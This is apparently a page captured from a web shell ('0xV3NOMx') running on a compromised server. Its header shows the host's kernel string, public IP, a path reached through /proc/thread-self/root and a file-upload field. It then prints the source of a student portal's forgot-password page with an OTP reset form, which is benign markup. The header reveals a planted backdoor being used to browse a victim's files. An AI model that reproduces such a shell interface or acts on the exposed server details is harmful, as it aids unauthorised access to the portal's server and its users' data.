0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.189.192.214


Current Path : /proc/thread-self/root/var/www/html/studentportal_test/
Upload File :
Current File : //proc/thread-self/root/var/www/html/studentportal_test/forgot-password.html

<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <title>Student Portal | Forgot Password</title>
    <!-- Favicon-->
    <link rel="icon" href="favicon.ico" type="image/x-icon">
    <link href="plugins/sweetalert/sweetalert.css" rel="stylesheet" />
    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css">

    <!-- Bootstrap Core Css -->
    <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet">

    <!-- Waves Effect Css -->
    <link href="plugins/node-waves/waves.css" rel="stylesheet" />

    <!-- Animation Css -->
    <link href="plugins/animate-css/animate.css" rel="stylesheet" />

    <!-- Custom Css -->
    <link href="css/style.css" rel="stylesheet">
</head>

<body class="fp-page" style="background: url(images/Background.jpg);">
    <div class="fp-box">
        <div class="logo">
            <a href="index.html">Student<b> Portal</b></a>
        </div>
        <div class="card">
            <div class="body">
                <form id="forgot_password_Email">
                    <div class="msg">
                        <b><u>Forgot Password</u></b>
                    </div>
                    <div class="input-group">
                        <span class="input-group-addon">
                            <i class="material-icons">smartphone</i>
                        </span>
                        <div class="form-line">
                            <input type="text" id='mobile' class="form-control" name="Mobile" placeholder="Registered Mobile" minlength="10" maxlength="10" required autofocus>
                        </div>
                    </div>
                    <span id='confirm' class='pull-left p-b-10' style="color: #0087ff;">
                    </span>
                    <div class="row">
                        <div class="col-xs-4 col-xs-offset-8">
                            <button id='btn_recover' class="btn btn-block bg-blue waves-effect"  onclick="recover()">Send-OTP</button>
                        </div>
                    </div>
                </form>

                <form id="resetpasswordform">
                    <div class="input-group">
                        <span class="input-group-addon">
                            <i class="material-icons">smartphone</i>
                        </span>
                        <div class="form-line">
                            <input type="text" id='motp' class="form-control" name="Mobile otp" minlength="6" placeholder="OTP" required>
                        </div>
                    </div>
                    <div class="input-group">
                        <span class="input-group-addon">
                            <i class="material-icons">lock</i>
                        </span>
                        <div class="form-line">
                            <input type="password" id="password" class="form-control" name="password" minlength="8" placeholder="Password" data-toggle="tooltip" data-placement="top" title="Minimum 8 Characters" maxlength="25" required>
                        </div>
                    </div>
                    
                    <div class="input-group">
                        <span class="input-group-addon">
                            <i class="material-icons">lock</i>
                        </span>
                        <div class="form-line">
                            <input type="password" id="cpassword" class="form-control" name="confirm"  placeholder="Confirm Password" data-toggle="tooltip" data-placement="top" title="Re-Enter Password"  maxlength="25" required>
                        </div>
                    </div>
                    <button class="btn btn-block btn-lg bg-blue waves-effect" id="confirm-btn" onclick='resetPasswd()'>Reset Password</button>

                </form>
                <div class="row m-t-20 m-b--5 align-center">
                        <a href="sign-in.html">Back to Sign In!</a>
                </div>
            </div>
        </div>
    </div>
    

    <!-- Jquery Core Js -->
    <script src="plugins/jquery/jquery.min.js"></script>

    <!-- Validation Plugin Js -->
    <script src="plugins/jquery-validation/jquery.validate.js"></script>
    <script type="text/javascript">
        //$('#forgot_password_Email').hide();
        $('form').submit(false);
        $('#forgot_password_Email').validate({
            highlight: function (input) 
			{
                $(input).parents('.form-line').addClass('error');
            },
            unhighlight: function (input) {
                $(input).parents('.form-line').removeClass('error');
            },
            errorPlacement: function (error, element) 
			{
				$(element).parents('.form-group').append(error);
                $(element).parents('.input-group').append(error);
            }
        });
    </script>

    <!-- Bootstrap Core Js -->
    <script src="plugins/bootstrap/js/bootstrap.js"></script>

    <!-- Waves Effect Plugin Js -->
    <script src="plugins/node-waves/waves.js"></script>

    <!-- Validation Plugin Js -->
    <script src="plugins/jquery-validation/jquery.validate.js"></script>
    <script src="plugins/sweetalert/sweetalert.min.js"></script>
    <!-- Custom Js -->
    <script src="js/admin.js"></script>
    <script src="js/forgot-password.js"></script>
</body>

</html>